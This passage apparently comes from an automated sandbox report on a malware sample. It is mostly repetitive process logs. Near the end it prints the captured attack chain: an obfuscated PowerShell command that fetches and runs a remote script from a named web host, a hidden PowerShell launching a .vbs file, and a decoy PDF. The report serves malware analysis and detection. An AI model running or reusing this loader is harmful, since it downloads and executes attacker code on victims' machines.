"Get-TimeZone", "Set-TimeZone")CompatiblePSEditions = @('Desktop','Core')} if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") { $myinv = $_.InvocationInfo if ($myinv -and $myinv.MyCommand)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4237Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5599Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3534Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 893Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -12912720851596678s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6356Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896Thread sleep count: 3534 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5912Thread sleep count: 893 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5332Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 7452Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: powershell.exe, 00000001.00000002.1710540369.000001512B9A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: powershell.exe, 00000001.00000002.1710540369.000001512B8F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
      Source: svchost.exe, 00000007.00000002.2732215502.0000023873442000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2732275923.0000023873454000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: svchost.exe, 00000007.00000002.2730612949.000002386DE2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: Yara matchFile source: amsi64_3020.amsi.csv, type: OTHER
      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3020, type: MEMORYSTR
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"Jump to behavior
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" ${t8ispk} = $pshome;${*wff6sn.} = ${t8ispk}[+52 -53 +1] + ${t8ispk}[-11 +2] + 'a' + ${t8ispk}[-66 +55];${wna.} = $([type]${*wff6sn.});${*.hqpoqw.} = ${wna.}::tostring(+79 -1 -5)+${wna.}::tostring(+79 -1 -5 -4)+${wna.}::tostring(+79 +30 -10 +21);&(${*.hqpoqw.})(&(${*.hqpoqw.})(${t8ispk}[+52 -53 +1]+'u'+${t8ispk}[-66 +55]+${t8ispk}[-61 +55]+' https://www.al-rasikh.com/mk/neat.txt -usebasicparsing'))
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
